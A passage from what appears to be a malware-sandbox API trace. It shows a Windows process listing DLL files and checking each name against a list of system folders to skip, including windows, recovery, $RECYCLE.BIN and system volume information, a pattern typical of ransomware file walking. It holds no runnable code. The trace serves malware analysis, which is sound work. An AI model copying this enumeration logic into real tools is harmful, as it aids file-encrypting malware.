cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Edm.NetFX35.dll", lpUsedDefaultChar=0x0) returned 30 [0123.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0123.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0123.237] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5174318, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5174318, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5174318, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1610c0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Data.OData.NetFX35.dll", cAlternateFileName="MI37F8~1.DLL")) returned 1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2=".") returned 1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="..") returned 1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="...") returned 1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="windows") returned -1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="recovery") returned -1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="perflogs") returned -1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="documents and settings") returned 1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="system volume information") returned -1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.OData.NetFX35.dll", lpString2="msocache") returned -1 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0123.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.OData.NetFX35.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.OData.NetFX35.dll", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.OData.NetFX35.dll", lpUsedDefaultChar=0x0) returned 32 [0123.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.OData.NetFX35.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.OData.NetFX35.dll", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.OData.NetFX35.dll", lpUsedDefaultChar=0x0) returned 32 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.238] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b15891, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c068, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Data.OData.Query.NetFX35.dll", cAlternateFileName="MI8F9F~1.DLL")) returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2=".") returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="..") returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="...") returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="windows") returned -1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="recovery") returned -1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="perflogs") returned -1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="documents and settings") returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="system volume information") returned -1 [0123.238] lstrcmpiW (lpString1="Microsoft.Data.OData.Query.NetFX35.dll", lpString2="msocache") returned -1 [0123.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.OData.Query.NetFX35.dll", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0123.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.OData.Query.NetFX35.dll", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.OData.Query.NetFX35.dll", lpUsedDefaultChar=0x0) returned 38 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.OData.Query.NetFX35.dll", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0123.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.OData.Query.NetFX35.dll", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.OData.Query.NetFX35.dll", lpUsedDefaultChar=0x0) returned 38 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.238] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfe368d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xfe368d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112040, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Exchange.WebServices.dll", cAlternateFileName="MIE0C3~1.DLL")) returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2=".") returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="..") returned 1 [0123.238] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="...") returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="windows") returned -1 [0123.239] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="recovery") returned -1 [0123.239] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="perflogs") returned -1 [0123.239] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="documents and settings") returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="system volume information") returned -1 [0123.239] lstrcmpiW (lpString1="Microsoft.Exchange.WebServices.dll", lpString2="msocache") returned -1 [0123.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0123.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Exchange.WebServices.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0123.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Exchange.WebServices.dll", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Exchange.WebServices.dll", lpUsedDefaultChar=0x0) returned 34 [0123.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0123.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Exchange.WebServices.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0123.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Exchange.WebServices.dll", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Exchange.WebServices.dll", lpUsedDefaultChar=0x0) returned 34 [0123.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0123.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0123.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.239] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x670f8d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x217840, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Client.Excel.dll", cAlternateFileName="MI0E0A~1.DLL")) returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2=".") returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="..") returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="...") returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="windows") returned -1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="recovery") returned -1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="perflogs") returned -1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="documents and settings") returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="system volume information") returned -1 [0123.239] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.dll", lpString2="msocache") returned -1 [0123.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0123.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.dll", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.dll", lpUsedDefaultChar=0x0) returned 33 [0123.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0123.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.dll", lpUsedDefaultChar=0x0) returned 33 [0123.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e688 [0123.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0123.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.240] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6840, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2=".") returned 1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="..") returned 1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="...") returned 1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="windows") returned -1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="recovery") returned -1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="perflogs") returned -1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="documents and settings") returned 1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="system volume information") returned -1 [0123.240] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpString2="msocache") returned -1 [0123.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0123.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0123.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpUsedDefaultChar=0x0) returned 46 [0123.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0123.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0123.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0123.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", lpUsedDefaultChar=0x0) returned 46 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0123.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.241] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4d20ecd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4d20ecd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32a8, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Client.Initialization.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2=".") returned 1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="..") returned 1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="...") returned 1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="windows") returned -1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="recovery") returned -1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="perflogs") returned -1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="documents and settings") returned 1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="system volume information") returned -1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Initialization.dll", lpString2="msocache") returned -1 [0123.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Initialization.dll", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0123.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Initialization.dll", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Initialization.dll", lpUsedDefaultChar=0x0) returned 42 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0123.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Initialization.dll", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0123.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Initialization.dll", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Initialization.dll", lpUsedDefaultChar=0x0) returned 42 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0123.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244840 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.241] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7bc5054, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7bc5054, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7bc5054, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14840, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Client.Models.dll", cAlternateFileName="MIC507~1.DLL")) returned 1 [0123.241] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2=".") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="..") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="...") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="windows") returned -1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="recovery") returned -1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="perflogs") returned -1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="documents and settings") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="system volume information") returned -1 [0123.242] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Models.dll", lpString2="msocache") returned -1 [0123.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0123.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 